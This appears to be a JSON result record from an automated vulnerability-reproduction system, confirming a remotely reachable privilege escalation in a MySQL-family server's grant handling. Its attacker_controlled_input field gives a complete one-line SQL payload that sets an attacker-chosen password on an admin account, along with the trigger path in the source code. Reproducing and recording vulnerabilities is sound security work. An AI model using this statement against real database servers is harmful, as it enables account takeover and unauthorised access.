{
  "_pruva_terminal_reconciliation": {
    "authored_artifact_closure_sha256": "14f4022f620ba98a5b16049f173d0ccf92dbfb69663a36f285245204d30c1097",
    "authored_runtime_manifest_sha256": "01cdd43b4c97df3c3f9c6beb1bb01fe2cf60195dcd6535d3cf516c5ae275ad89",
    "authored_verdict_sha256": "9f5f22243a40791131e979f31f2c4ae496ee70c85d8f23ae896d4e6929afd14d",
    "claim_matching": "evaluated",
    "schema_version": 2,
    "status": "completed"
  },
  "attacker_controlled_input": "Single SQL statement from a USAGE-only authenticated session: GRANT PROXY ON CURRENT_USER() TO 'victim_admin'@'%' IDENTIFIED VIA '' OR mysql_native_password USING PASSWORD('hacked')",
  "claim_outcome": "confirmed",
  "claimed_impact_class": "privilege_escalation",
  "claimed_surface": "api_remote",
  "crash_observed": false,
  "end_to_end_target_reached": true,
  "evidence_scope": "production_path",
  "exploit_chain_demonstrated": true,
  "exploitability_confidence": "high",
  "inferred": false,
  "observed_impact_class": "privilege_escalation",
  "read_write_primitive_observed": false,
  "repro_result": "confirmed",
  "sanitizer_used": false,
  "trigger_path": "MySQL TCP endpoint (port 3306) -> SQL parser/grant path (sql_acl.cc, LEX_USER::has_auth in structs.h) -> replace_user_table() persists attacker-controlled second auth node onto victim account",
  "validated_surface": "api_remote"
}
